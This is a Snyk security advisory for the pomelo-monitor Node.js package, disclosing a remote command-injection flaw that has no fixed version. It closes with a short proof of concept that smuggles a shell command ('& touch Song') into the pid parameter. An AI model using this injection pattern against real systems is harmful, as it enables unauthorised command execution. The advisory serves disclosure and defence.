Remote Code Execution (RCE) Affecting pomelo-monitor package, versions *


0.0
medium

Snyk CVSS

    Attack Complexity High
    Confidentiality High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.37% (73rd percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-POMELOMONITOR-173695
  • published 28 Dec 2018
  • disclosed 14 Feb 2018
  • credit JHU System Security Lab

How to fix?

There is no fixed version for pomelo-monitor.

Overview

pomelo-monitor is a Simple, comprehensive monitoring tool for operating-system and process in nodejs.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). It is possible to inject arbitrary commands as part of pomelo-monitor params.

PoC


var root =require("pomelo-monitor");
var param ={
  pid: "& touch Song "
}

root.psmonitor.getPsInfo(param,function(){});